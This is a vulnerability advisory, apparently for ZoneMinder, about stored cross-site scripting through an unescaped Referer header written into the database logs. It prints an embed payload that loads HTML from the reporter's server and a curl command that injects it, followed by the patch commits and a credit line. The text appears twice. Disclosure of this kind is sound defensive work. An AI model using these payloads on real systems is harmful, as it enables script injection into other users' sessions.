Impact
Log entries can be injected into the database logs, containing a malicious referrer field. This is unescaped when viewing the logs in the web ui.
The payload is then: <embed type="text/html" src="http://hive.daho.at/xsstest.html" width="10" height="10">
hive.daho.at is my server, file should still be there, content is simple: <script>alert('Hello from the XSS');</script>
In a complete curl statement: curl 'http:///zm/cgi-bin/nph-zms?user=admin&token=asdfa' -H 'Referer: %3Cembed%20type=%22text/html%22%20src=%22http://hive.daho.at/xsstest.html%22%20width=%2210%22%20height=%2210%22%3E'
Patches
Fixed by 4637eaf, then 57bf25d and e1028c1
Workarounds
Patch manually.
Credit
Daniel Hofer
Impact
Log entries can be injected into the database logs, containing a malicious referrer field. This is unescaped when viewing the logs in the web ui.
The payload is then: <embed type="text/html" src="http://hive.daho.at/xsstest.html" width="10" height="10">
hive.daho.at is my server, file should still be there, content is simple: <script>alert('Hello from the XSS');</script>
In a complete curl statement: curl 'http:///zm/cgi-bin/nph-zms?user=admin&token=asdfa' -H 'Referer: %3Cembed%20type=%22text/html%22%20src=%22http://hive.daho.at/xsstest.html%22%20width=%2210%22%20height=%2210%22%3E'
Patches
Fixed by 4637eaf, then 57bf25d and e1028c1
Workarounds
Patch manually.
Credit
Daniel Hofer